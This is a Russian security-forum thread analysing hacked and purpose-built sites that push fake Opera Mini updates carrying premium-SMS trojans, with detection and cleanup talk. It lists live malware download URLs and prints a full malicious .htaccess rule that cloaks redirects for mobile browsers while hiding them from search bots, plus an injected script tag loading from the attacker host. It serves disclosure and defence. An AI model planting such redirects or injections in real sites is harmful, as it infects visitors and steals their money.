Перейти к содержанию

Recommended Posts

priv8v
976a6b733169.jpg


Тем, кому приходиться путешествовать по просторам интернета с мобильного гаджета с помощью Opera Mini, тому наверняка знакома эта удручающая картина - хочешь зайти на сайт, а тебе пытаются впарить новую оперу...

Если скачивать, то есть всего два варианта развития событий:

1. По ссылке будет лежать зловред (для телефона, разумеется), который будет прожорлив до отправки платных смс
2. Будет лежать Опера, но в обертке опять таки трояна с тем же функционалом, что и в первом пункте (может даже с ЛС, в котором цены будут указаны)

Хочется отметить, что данные сайты являются зараженными на достаточно глубоком уровне (не ифреймом), зловредный файл лежит прямо среди других файлов сайта...

Ниже будут приведены адреса некоторых сайтов, краткое описание что и почему происходит и (чтобы не быть голословным) ссылки на ВТ на анализ файлов.

На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar
Зараженный файл на сайте:
_http://vsofte.ru//templates/WebTPL/js/jquery-1.4.2.min.js

На _flashki.ru (по запросу "игры" в гугле на втором месте сайт, кстати) редиректит на _http://opera-new6.ru/?id=678
а если на _opera-new6.ru/download/?id=678 заходить с обычным юзерагентом, то выцепляется просто имя ОСи (винды) и качается setup.CAB с 46.161.31.167
Все благодаря _http://flashki.ru//shared/js/jquery/simplemodal/jquery.simplemodal.js

А вот и под андроид:
http://mobile-premium-v10.com/jar/Opera_Mini_NEW_04548.jar слив идет, с хтаксесом помудрено видимо там...)

Еще на взломанных сайтах встречаются редиректы на:
_http://updateyouropera.ru_http://mobile-premium-v9.com_http://dl1.mobile-download.ru/midlet/d1Gnhe/m1/mt73/a10_5_3/nOpera Mini/s79203/sm1/Opera_Mini.jar




Таких хакнутых сайтов достаточно много...

  • Upvote 10

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

сейчас пришло в голову, что я ступанул с механизмом заражения сайтов, поторопился все поздним вечером за раз сделать...

склоняюсь к заражению пхп кода файлов, возможно, что путей/механизмов заражения сайта несколько...

в общем вопрос пока открытым остается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

С чего ты вообще решил, что это "зараженные" сайты ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

хм, ну ведь я же постом выше написал, что этот вопрос оставляю открытым про пути и механизмы заражения, т.к у меня тут по всем пунктам сомнения...

В любом случае заражены, вопрос в том где админ, а где хакеры постарались, и в том КАК именно заражены (что за файлы, когда, зачем(типа где и что за партнерка это и сколько их))...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar

Качает под ОС. С Андроида качает apk, как положено. Детект KMS:

screenshot_1317886734256.png

post-3736-1317887041_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

В любом случае огромное спасибо за интересное исследование. Вы уже давно должны ИМХО быть в Экспертном совете АМ.

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Umnik, спасибо, я как раз хотел попросить попроверять с разных осей, у самого сейчас руки не доходят все варианты перебрать...

подделайтесь под симбиан, вдруг еще сис выдаст)))

ps: пишу с оперы мини (не фальшивой:))

ps2: что кто может сказать более четко про масштабы и пути заражения?

просто в ближайшие дни я не буду за своим компом скорее всего...

в идеале еще надо паучка на пыхе написать который прочекаекает топ-20 по популярным запросам в поисковик..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Вот где собака-то серьезная зарылась! На моей памяти еще не было такой оккупации зловредами интернета, чтобы в немеренных количествах в топе практически всех популярных поисковых запросов ((

Каспер/др.веб детектит эти файлы?

ps: эпидемия - просто не то слово...(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Ну вот сам же посмотри http://lemoby.ru/

Это все не взломанные сайты, а специально созданные.

То что Яндекс так и не научился должным образом чистить выдачу, несмотря на все свои потуги - печально, да.

Но тем хуже ему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Это все не взломанные сайты, а специально созданные.

A.

в самой поисковой выдаче сайты были вроде terr.ru и students.ru, а уже с НИХ были редиректы на вышеприведенные сайты. То ли я как-то криво пишу, то ли меня как-то криво понимают...

Opera/9.80 (Windows Mobile; Opera Mini/5.1.21594/26.950; U; ru) Presto/2.8.119 Version/10.54

Кстати, поисковая выдача отличается при разных юзерагентах! Учитывайте это!

PS: может я и перегибаю планку с всерунетовской эпидемией что аж всем хана, но масштабы правда достаточно велики )))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Содержание хтаксесс на сайте, где вебмастер козел:

RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !tion [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://opera-new6.ru/?id=ТУТ_ID [L,R=302]

А если через яваскрипт, то так будет:

<script type='text/javascript' src='http://opera-new6.ru/js/?link=http%3A%2F%2Fopera-new6.ru%2F%3Fid%ТУТ_ID'></script>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik
Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября

ну да, давно встречаются, просто сейчас наболело и решил написать...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Нарыл около сотни зловредных доменов (не сайтов, где админы трафф сливают, а конечные - т.е те, КУДА льют, откуда качают). Что с ними делать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

Означает ли это что кроме DrWeb ранее 29 сентября никто не детектировал зловреда? Если не означает, то откуда такая уверенность в том, что DrWeb единственый?

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Причем тут покупка? Не уводите обсуждение в сторону. Речь идет о суперэксклюзиве от DrWeb. Итак, если вы настаиваете, что DrWeb единственный, то прошу более основательно аргументировать свою позицию, если других аргументов нет, то может не стоило писать в таком категоричном тоне о превосходстве DrWeb?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

кстати, сегодня лечил подобное. Оказался Android.smssender.86

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

каким способом? зашли туда с виртуалки с пятого IE?))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Firefox-ом, отключив AdBlock и NoScript (и плагины, конечно)

scr1.jpg

post-5047-1317922701_thumb.jpg

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr
в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

да не совсем... появление предупреждения у человека про старую версию Оперы воспринял верно. Заблочил СМС сервис, вынес саму псевдо - оперу, а потом искал - что еще воткнулось в последнее время. Нашел.... Потом отловленное проверил на рабочем компе Авастом - вердикт подтвердился

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Dima2_90
      Об особенностях сканирования исполняемых файлов антивирусами и доверии результатам VirusTotal - https://habr.com/post/346480/ Цитаты из статьи "Забавно, детект уменьшился с 60 для неупакованного файла и 41 для архива до 17 — при этом ни один из антивирусных движков не обнаружил Eicar, детекты явно имеют эвристический характер, а в ряде случаев напоминают ложное срабатывание (DrWeb, Baidu и др.)" "6 детектов из 67. Шесть, Карл! Все — эвристические. И скорее всего ничего не подозревающий пользователь посчитает файл безопасным." "современные антивирусные сканеры так и остались барахлом, которым были десяток-два лет назад, абсолютно пасующим перед простейшими видами упаковки кода. Решения в виде тестовых сред — «песочниц», эвристических анализаторов и т.д. только добавили неразберихи, ложных срабатываний, но по сути не защищают от реальной угрозы. Со старым, открытым и разжёванным до потрохов UPX как был бардак — так он и остался. А ведь я вполне мог упаковать не файл, вызывающий вредоносную активность, а непосредственно код, работать не с файлами на диске в %temp%, а в памяти, использовать не свободно доступные утилиты, а собственные или закрытые разработки — и таким образом обойти срабатывание резидентной защиты. Я вполне мог добавить интересные элементы интерфейса или скопировать таковой из распространённой программы — и обойти проактивку у неискушённого пользователя, который просто будет соглашаться с любыми запросами, доверяя тому, что запустил.

      То, что мы сделали выше — примитивный способ обмануть антивирус, который может понять и реализовать практически любой. И он сработал. Что говорить про искушённых специалистов!"
    • Dima2_90
      Ad-Aware --------- https://www.adaware.com/support/securitycenter/report_false_positives.php  Antiy-AVL --------- [email protected] Avast --------------- https://www.avast.ru/false-positive-file-form.php AVG ---------------- https://www.avg.com/ru-ru/false-positive-file-form Avira --------------- https://analysis.avira.com/en/submit BitDefender -------- https://www.bitdefender.com/submit/ ClamAV ------------ http://www.clamav.net/reports/fp DrWeb ------------- https://vms.drweb.ua/sendvirus ESET-NOD32 ------- https://www.esetnod32.ru/support/knowledge_base/new_virus/ Kaspersky --------- https://virusdesk.kaspersky.ru/ Microsoft ---------- https://www.microsoft.com/en-us/wdsi/filesubmission NANO-Antivirus ---- http://nanoav.ru/index.php?option=com_content&view=article&id=15&Itemid=83&lang=ru Symantec ---------- https://submit.symantec.com/false_positive/
    • Липковский Борис
      Вдруг понадобится, спасибо за информацию.
    • Липковский Борис
      Я собираю с разных стран магнитики. Это очень круто.
    • Липковский Борис
      Каждый находит свое увлечение.Заработок зависит от работы которую ты умеешь делать на отлично. Самое главное если есть время.
×